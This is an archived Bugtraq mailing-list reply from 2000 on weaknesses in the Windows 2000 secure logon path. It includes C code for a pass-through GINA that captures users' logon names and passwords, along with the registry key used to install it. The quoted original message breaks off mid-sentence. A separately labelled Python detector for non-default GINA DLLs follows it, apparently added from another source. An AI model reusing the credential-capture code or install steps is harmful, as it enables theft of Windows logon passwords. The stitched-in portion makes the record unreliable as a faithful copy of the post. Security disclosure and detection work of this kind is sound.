Re: Windows 2000 Run As... Feature
Subject: Re: Windows 2000 Run As... Feature
From: jdglaser (jdglaser at NTOBJECTIVES.COM)
Date: Mon Jan 24 2000 - 08:31:31 CST
- Next message: Steven Kastl: "Re: Windows 2000 Run As... Feature"
- Previous message: Darren Moffat - Solaris Sustaining Engineering: "Re: Solaris 7 and solaris 8 file permissions"
- Maybe in reply to: David Terrell: "Windows 2000 Run As... Feature"
- Next in thread: Camillo Särs: "Re: Windows 2000 Run As... Feature"
- Next in thread: Steven Kastl: "Re: Windows 2000 Run As... Feature"
- Maybe reply: jdglaser: "Re: Windows 2000 Run As... Feature"
- Reply: Camillo Särs: "Re: Windows 2000 Run As... Feature"
- Reply: David LeBlanc: "Re: Windows 2000 Run As... Feature"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
That's a good point.
I'd like to add that MS Secure Attention Sequence is not exactly so
trusted.
Nothing prevents another Gina from being put into play, nor prevents
process code injection - DLL API hooking.
One way to do this is by altering the reg key
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
to implement a Pass-Through Gina (one which grabs your password and then
calls through to the real Gina).
While SAS prevents the old-style pop and disappear logon screens, it does
nothing to prevent password interception by trojan dll injection.
Both of these compromise the trust of the current SAS implementation.
In light of that, I'm not sure another password path matters.
Just my thoughts,
jdg
Attached is an example of GINA pass-through code - pop the below listed
code into a dll, write the dll name as the value to the above listed key
and SAS now has an untrusted element.
int WINAPI WlxLoggedOutSAS (PVOID pWlxContext, DWORD dwSasType,
                            PLUID pAuthenticationId, PSID pLogonSid,
                            PDWORD pdwOptions, PHANDLE phToken,
                            PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,
                            PVOID *pProfile)
{
    // call real gina api
    iRet = GWlxLoggedOutSAS (pWlxContext, dwSasType, pAuthenticationId,
                             pLogonSid, pdwOptions, phToken, pMprNotifyInfo,
                             pProfile);

    pMprNotifyInfo->pszUserName;   // <- Grab this
    pMprNotifyInfo->pszPassword;   // <- Grab this
    // <insert whatever>
    hFile = CreateFile ();         // <- Store it, send it, mail it
    WriteFile ();
    CloseHandle (hFile);
    return iRet;
}
-----Original Message-----
From: David Terrell [SMTP:dbt at meat.net]
Sent: Friday, January 21, 2000 3:49 PM
To: BUGTRAQ at SECURITYFOCUS.COM
Subject: Windows 2000 Run As... Feature
>this is the first time (I know of) that the system asks for your password
>through a mechanism other than the trusted path (ctrl-alt-del to
>login,
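As an added, defender-side example (not part of the post above): a small Python check that reads a `reg export` of the Winlogon key the post names and flags a GINA DLL that is not the default or that loads from outside system32. It assumes the `GinaDLL` value name (the post names only the key), and both sample exports are constructed.

```python
import re
from typing import Dict, List, Optional

WINLOGON_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
DEFAULT_GINA = "msgina.dll"   # the stock GINA; value name "GinaDLL" is assumed here

# Constructed sample of a `reg export` of the Winlogon key with a replaced GINA.
SUSPECT_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe"
"Userinit"="C:\\WINNT\\system32\\userinit.exe,"
"GinaDLL"="C:\\temp\\passgina.dll"
"""

# Constructed sample where GinaDLL is explicitly set to the default.
CLEAN_REG_EXPORT = r"""[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"GinaDLL"="msgina.dll"
"""


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal parser for REG_SZ values in a .reg export: {key: {name: value}}."""
    keys: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None:
            m = re.match(r'^"([^"]+)"="(.*)"$', line)
            if m:
                # .reg files escape each backslash as "\\"; undo that.
                keys[current][m.group(1)] = m.group(2).replace("\\\\", "\\")
    return keys


def check_gina(keys: Dict[str, Dict[str, str]]) -> List[str]:
    """Return findings about the GinaDLL value; an empty list means nothing suspicious."""
    winlogon = {k.lower(): v for k, v in keys.items()}.get(WINLOGON_KEY.lower())
    if winlogon is None:
        return ["Winlogon key not present in export"]
    gina = {n.lower(): v for n, v in winlogon.items()}.get("ginadll")
    if gina is None:
        return []   # no override: the default GINA is loaded
    findings = []
    if gina.replace("/", "\\").rsplit("\\", 1)[-1].lower() != DEFAULT_GINA:
        findings.append(f"GinaDLL points to a non-default DLL: {gina}")
    if "\\" in gina and "\\system32\\" not in gina.lower():
        findings.append(f"GinaDLL loads from outside system32: {gina}")
    return findings
```

Feed it the output of `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" winlogon.reg`; any finding deserves a look at the named DLL's origin and signature.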
This archive was generated by hypermail 2b27 : Mon Jan 24 2000 - 21:46:19 CST